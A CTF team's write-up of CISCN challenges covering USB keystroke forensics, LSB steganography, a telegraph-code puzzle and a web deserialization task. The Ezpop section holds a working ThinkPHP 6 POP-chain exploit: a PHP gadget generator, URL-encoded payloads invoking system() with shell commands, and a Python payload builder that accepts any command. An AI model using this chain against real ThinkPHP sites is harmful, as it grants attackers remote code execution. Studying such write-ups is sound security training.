Preface

This was our first year at CISCN. The national finals' challenges turned out to be much harder than those of other CTF events, but the quality was high (apart from the three crypto challenges with unintended solutions). The team solved six challenges in total (one of them the questionnaire) and placed 406th nationally, which for our first national competition is already a very good result~~~ We'll keep at it next year!

Update, June 3: Whoa! We actually advanced. Truly didn't expect that; looks like another full day of grinding ahead :P

Teammates: 808, nLesxw, R136a1

Misc

ez_usb

  • In Wireshark, filter on usb.src == "2.10.1" and usb.dst == "host"; across the matching packets only the third byte of the data changes.

Extract that third byte from each packet.

  • The extracted bytes give 35c535765e50074a, which is the archive password.

  • Extract the archive with that password to get the final result.
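
Picking the third byte out by hand works for a short password, but the same data can be decoded properly. The following is an added example written for this note (not the author's script or any challenge file): it decodes 8-byte USB HID boot-protocol keyboard reports, the records Wireshark shows as usb.capdata, into text, handling the Shift modifier and Backspace that a plain "take the third byte" approach misses. The sample reports are constructed to spell the password above and a second, shifted string; the usage IDs are those of the HID Usage Tables keyboard page.

```python
# Added example: decode USB HID boot-protocol keyboard reports (the 8-byte
# usb.capdata records Wireshark shows) into the typed text. The sample data
# below is constructed for the demo, not taken from the challenge capture.

# HID Usage Tables, keyboard/keypad page (0x07): (unshifted, shifted) per key.
KEYS = {}
for i in range(26):                                   # 0x04..0x1d: a..z
    KEYS[0x04 + i] = (chr(ord("a") + i), chr(ord("A") + i))
for i, (d, s) in enumerate(zip("1234567890", "!@#$%^&*()")):
    KEYS[0x1e + i] = (d, s)                           # 0x1e..0x27: 1..9, 0
KEYS.update({
    0x28: ("\n", "\n"), 0x2b: ("\t", "\t"), 0x2c: (" ", " "),
    0x2d: ("-", "_"), 0x2e: ("=", "+"), 0x2f: ("[", "{"), 0x30: ("]", "}"),
    0x31: ("\\", "|"), 0x33: (";", ":"), 0x34: ("'", '"'), 0x35: ("`", "~"),
    0x36: (",", "<"), 0x37: (".", ">"), 0x38: ("/", "?"),
})
BACKSPACE = 0x2a
SHIFT_MASK = 0x22    # byte 0: bit 1 = left Shift, bit 5 = right Shift


def decode_reports(hex_reports):
    """Turn hex-encoded 8-byte keyboard reports into the text that was typed.

    Byte 0 carries the modifier bits, byte 1 is reserved, bytes 2..7 hold the
    usage IDs of up to six simultaneously pressed keys (the "third byte" that
    varies in the challenge capture is the first of them). A key is emitted
    only when it is present in a report and was absent from the previous one,
    so repeated reports while a key is held down do not duplicate characters.
    """
    text = []
    previously_down = set()
    for hexrep in hex_reports:
        report = bytes.fromhex(hexrep)
        if len(report) != 8:
            continue  # not a boot-protocol keyboard report; skip it
        shifted = bool(report[0] & SHIFT_MASK)
        now_down = {k for k in report[2:8] if k}
        for key in sorted(now_down - previously_down):
            if key == BACKSPACE:
                if text:
                    text.pop()
            elif key in KEYS:
                text.append(KEYS[key][1 if shifted else 0])
        previously_down = now_down
    return "".join(text)


RELEASE = "0000000000000000"   # all keys up

# Constructed: key presses that type the archive password, each followed by a release.
PASSWORD_PRESSES = [
    "0000200000000000", "0000220000000000", "0000060000000000", "0000220000000000",
    "0000200000000000", "0000220000000000", "0000240000000000", "0000230000000000",
    "0000220000000000", "0000080000000000", "0000220000000000", "0000270000000000",
    "0000270000000000", "0000240000000000", "0000210000000000", "0000040000000000",
]
PASSWORD_CAPDATA = [r for p in PASSWORD_PRESSES for r in (p, RELEASE)]

# Constructed: left Shift + f, then l, a, h, Backspace, g  ->  "Flag"
SHIFT_CAPDATA = [r for p in (
    "0200090000000000", "00000f0000000000", "0000040000000000",
    "00000b0000000000", "00002a0000000000", "00000a0000000000",
) for r in (p, RELEASE)]

if __name__ == "__main__":
    print(decode_reports(PASSWORD_CAPDATA))   # 35c535765e50074a
    print(decode_reports(SHIFT_CAPDATA))      # Flag
```

To feed it a real capture, export the data field with tshark -r capture.pcapng -Y 'usb.src == "2.10.1" && usb.dst == "host"' -T fields -e usb.capdata (newer Wireshark builds dissect HID payloads as usbhid.data instead) and pass the resulting lines to decode_reports.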

everlasting_night

  • Opening the file in 010 Editor shows something out of place:

    fb3efce4ceac2f5445c7ae17e3e969ab

  • Reversing that MD5 hash via lookup

    gives ohhWh04m1

  • The hint says it has to do with LSB

which gives f78dcd383f1b574b

  • That points to LSB steganography with a password.

    Extracting it yields an archive; its password is ohhWh04m1, and unpacking it gives an image.

    Strip the file header in 010 Editor, then open the remaining raw data in GIMP with width 352 and height 287 to reveal the flag.
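
Two of the steps above are mechanical enough to be worth seeing in code. The following is an added example, not the author's tooling or any file from the challenge: a minimal LSB embed/extract over raw RGB channel bytes (a password-protected stego tool adds encryption on top of exactly this bit-plane step), and a helper that lists the width/height pairs a headerless raw pixel blob can be opened with, which is the question GIMP's raw-data import asks once the header has been removed. The cover pixels, the payload and the 352×287 geometry used to check the helper are constructed for the demo.

```python
# Added example: LSB steganography over raw channel bytes, and recovering the
# geometry of a headerless raw pixel blob. All inputs are constructed here.

def embed_lsb(cover, payload):
    """Overwrite the LSB of consecutive channel bytes with the payload bits, MSB first."""
    if len(payload) * 8 > len(cover):
        raise ValueError("cover image too small for payload")
    out = bytearray(cover)
    for i, byte in enumerate(payload):
        for j in range(8):
            idx = i * 8 + j
            out[idx] = (out[idx] & 0xFE) | ((byte >> (7 - j)) & 1)
    return bytes(out)


def extract_lsb(pixels, nbytes):
    """Read nbytes back from the LSB plane; the first step of any LSB stego extractor."""
    if nbytes * 8 > len(pixels):
        raise ValueError("not enough pixel data")
    result = bytearray()
    for i in range(nbytes):
        byte = 0
        for j in range(8):
            byte = (byte << 1) | (pixels[i * 8 + j] & 1)
        result.append(byte)
    return bytes(result)


def candidate_dimensions(nbytes, bytes_per_pixel=3, min_side=16):
    """All (width, height) pairs that exactly tile a headerless raw pixel blob.

    With the header gone, the only constraint left is
    width * height * bytes_per_pixel == nbytes, which usually narrows the
    geometry to a short list worth trying in GIMP's raw import dialog.
    """
    if nbytes % bytes_per_pixel:
        return []
    npix = nbytes // bytes_per_pixel
    return [(w, npix // w) for w in range(min_side, npix // min_side + 1) if npix % w == 0]


WIDTH, HEIGHT = 352, 287     # the geometry used on this page
# Constructed RGB cover: deterministic pseudo-texture, 3 bytes per pixel.
COVER = bytes((i * 73 + (i >> 8)) & 0xFF for i in range(WIDTH * HEIGHT * 3))
SECRET = b"lsb payload: constructed test data"   # constructed payload

if __name__ == "__main__":
    stego = embed_lsb(COVER, SECRET)
    print(extract_lsb(stego, len(SECRET)))
    print((WIDTH, HEIGHT) in candidate_dimensions(len(COVER)))
```

For a real file, read the header-stripped blob with open(path, "rb").read() and pass its length to candidate_dimensions; at 3 bytes per pixel, 352 × 287 is one of the pairs returned for a 303072-byte blob.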

Web

Ezpop

  • The challenge hint says "the latest version of ThinkPHP, but we are told the latest version is vulnerable", and the name "pop" tells us this is a deserialization bug that we exploit by building a POP chain.

  • Read this article: https://xz.aliyun.com/t/10396

From the figure in that article we know the vulnerable route is …../index.php/index/xxxxxxxx (the xxxx in the figure is the payload).

There the parameter is 'c', but we don't yet know which parameter we control here, so we need this challenge's source code.

  • We scan with dirsearch.

It finds a www.zip archive; downloading and opening it gives the site's source code.

So we look for our controllable parameter and for what the xxxx in the route is.

  • With that question in mind, in \www\app\controller\Index.php we find:

    <?php
    namespace app\controller;

    use app\BaseController;

    class Index extends BaseController
    {
        public function index()
        {
            return '<style type="text/css">*{ padding: 0; margin: 0; } div{ padding: 4px 48px;} a{color:#2E5CD5;cursor: pointer;text-decoration: none} a:hover{text-decoration:underline; } body{ background: #fff; font-family: "Century Gothic","Microsoft yahei"; color: #333;font-size:18px;} h1{ font-size: 100px; font-weight: normal; margin-bottom: 12px; } p{ line-height: 1.6em; font-size: 42px }</style><div style="padding: 24px 48px;"> <h1>:) </h1><p> ThinkPHP V' . \think\facade\App::version() . '<br/><span style="font-size:30px;">14载初心不改 - 你值得信赖的PHP框架</span></p><span style="font-size:25px;">[ V6.0 版本由 <a href="https://www.yisu.com/" target="yisu">亿速云</a> 独家赞助发布 ]</span></div><script type="text/javascript" src="https://tajs.qq.com/stats?sId=64890268" charset="UTF-8"></script><script type="text/javascript" src="https://e.topthink.com/Public/static/client.js"></script><think id="ee9b1aa918103c4fc"></think>';
        }

        public function hello($name = 'ThinkPHP6')
        {
            return 'hello,' . $name;
        }

        // The sink: attacker-controlled POST data goes straight into unserialize().
        public function test()
        {
            unserialize($_POST['a']);
        }
    }

    This confirms the parameter name is a and the vulnerable route is http://eci-2ze3qe3v4f3btke7kreo.cloudeci1.ichunqiu.com/index.php/index/test

  • Following the article, we build the payload:

    <?php
    // Gadget generator for the ThinkPHP 6 Model chain from the article above.
    // The properties keep the same visibility as in the real think\Model so
    // that serialize() emits the same mangled (\0-prefixed) property names.
    namespace think {
        abstract class Model {
            private $lazySave = false;
            private $data = [];
            private $exists = false;
            protected $table;
            private $withAttr = [];
            protected $json = [];
            protected $jsonAssoc = false;

            function __construct($obj = '') {
                $this->lazySave = true;                      // __destruct() calls save()
                $this->data = ['whoami' => ['ls /']];        // command to execute
                $this->exists = true;                        // save() takes the update path
                $this->table = $obj;                         // nested Pivot: string concatenation hits __toString()
                $this->withAttr = ['whoami' => ['system']];  // callable applied to the attribute value
                $this->json = ['whoami', ['whoami']];
                $this->jsonAssoc = true;
            }
        }
    }

    namespace think\model {
        use think\Model;
        // Concrete subclass of the abstract Model that can actually be instantiated.
        class Pivot extends Model {
        }
    }

    namespace {
        echo urlencode(serialize(new think\model\Pivot(new think\model\Pivot())));
    }

    a=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A4%3A%22ls+%2F%22%3B%7D%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A4%3A%22ls+%2F%22%3B%7D%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3Bs%3A0%3A%22%22%3Bs%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3Bi%3A1%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3Bi%3A1%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7D

  • The ls / output reveals the flag file's location and name (/flag.txt), so we build the final payload:

    a=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22cat+%2Fflag.txt%22%3B%7D%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22cat+%2Fflag.txt%22%3B%7D%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3Bs%3A0%3A%22%22%3Bs%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3Bi%3A1%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3Bi%3A1%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7D
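
To see exactly what those two payloads are made of, here is an added example (written for this writeup, not code from the original post, the linked article or ThinkPHP) that rebuilds the same serialized Pivot object in Python and URL-encodes it the way PHP's urlencode() does. It makes visible why the payload has to be URL-encoded: PHP serializes private properties as \0think\Model\0name and protected ones as \0*\0name, and those NUL bytes do not survive a plain copy-paste into a POST body. It also shows that the only difference between the two payloads above is the command inside data['whoami']; the outer object's table holds the inner object so that the framework's string concatenation reaches __toString() on it, as described in the linked article. Class and property names are those of the generator above.

```python
# Added example: build the ThinkPHP 6 Pivot payload from the page in Python,
# reproducing PHP's serialize() and urlencode() output for these value types.
from urllib.parse import quote_plus

MODEL = "think\\Model"          # class that declares the private properties
PIVOT = "think\\model\\Pivot"   # concrete subclass we actually instantiate


class PHPObject:
    """A PHP object to serialize: class name plus an ordered list of
    (mangled property name, value) pairs, in declaration order."""

    def __init__(self, cls, props):
        self.cls, self.props = cls, props


def private(cls, name):
    # PHP mangles private property names as "\0<declaring class>\0<name>"
    return f"\0{cls}\0{name}"


def protected(name):
    # ... and protected ones as "\0*\0<name>"
    return f"\0*\0{name}"


def php_serialize(v):
    """serialize() for bool, int, str, list, dict and PHPObject."""
    if isinstance(v, bool):
        return f"b:{int(v)};"
    if isinstance(v, int):
        return f"i:{v};"
    if isinstance(v, str):
        return f's:{len(v.encode())}:"{v}";'   # length in bytes, NULs included
    if isinstance(v, list):
        v = dict(enumerate(v))                   # PHP arrays are ordered maps
    if isinstance(v, dict):
        body = "".join(php_serialize(k) + php_serialize(x) for k, x in v.items())
        return f"a:{len(v)}:{{{body}}}"
    if isinstance(v, PHPObject):
        body = "".join(php_serialize(k) + php_serialize(x) for k, x in v.props)
        return f'O:{len(v.cls)}:"{v.cls}":{len(v.props)}:{{{body}}}'
    raise TypeError(f"unsupported type {type(v).__name__}")


def pivot(cmd, table):
    """One Pivot object with the property values the page's generator sets."""
    return PHPObject(PIVOT, [
        (private(MODEL, "lazySave"), True),
        (private(MODEL, "data"), {"whoami": [cmd]}),
        (private(MODEL, "exists"), True),
        (protected("table"), table),          # inner Pivot or '' for the innermost one
        (private(MODEL, "withAttr"), {"whoami": ["system"]}),
        (protected("json"), ["whoami", ["whoami"]]),
        (protected("jsonAssoc"), True),
    ])


def build_payload(cmd):
    """URL-encoded value for the POST parameter a=..., as PHP's urlencode() would emit."""
    chain = pivot(cmd, pivot(cmd, ""))
    return quote_plus(php_serialize(chain))


if __name__ == "__main__":
    print("a=" + build_payload("ls /"))
    print("a=" + build_payload("cat /flag.txt"))
```

quote_plus matches PHP's urlencode() for this payload (space to +, everything except alphanumerics and -_. percent-encoded in upper-case hex); the two strings printed are the two payloads shown above.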

Crypto

签到电台 (sign-in radio station)

  1. Looking over the challenge, we notice the QR code below it;

  2. Scanning it with WeChat gives the hint: look up the seven telegraph codes for the characters of "届时安全到达了" ("will arrive safely at the appointed time") in the Standard Telegraph Code table: 1732 2514 1344 0356 0451 6671 0055, and take the first 7×4 digits of the "code book": 8832 3478 7944 9679 3253 2558 0058.

  3. Then, following the challenge's hint, combine the two digit strings position by position with "mod-10 arithmetic" (add without carrying, subtract without borrowing) to get 9564 5982 8828 9925 3604 8129 0003.

  4. Next, as the challenge requires, send "s" on the telegraph, i.e. key in "..." (Morse for S) to switch it on; the page shows telegraph started.

  5. Finally, capture the request with Burp and, in Repeater, put 9564 5982 8828 9925 3604 8129 0003 after /send?msg= and send it to get the flag.

基于挑战码的双向认证 (challenge-code-based mutual authentication)

  1. First connect via ssh, enter the cube_challenge/src/login_user directory as the challenge instructs, and try compiling directly (make).
  2. Then go back to the cube-challenge directory and run, in order: sh set_env.sh, sh run_cube.sh, sh login.sh, sh login_challenge.sh

Finally run sh player.sh to get the flag.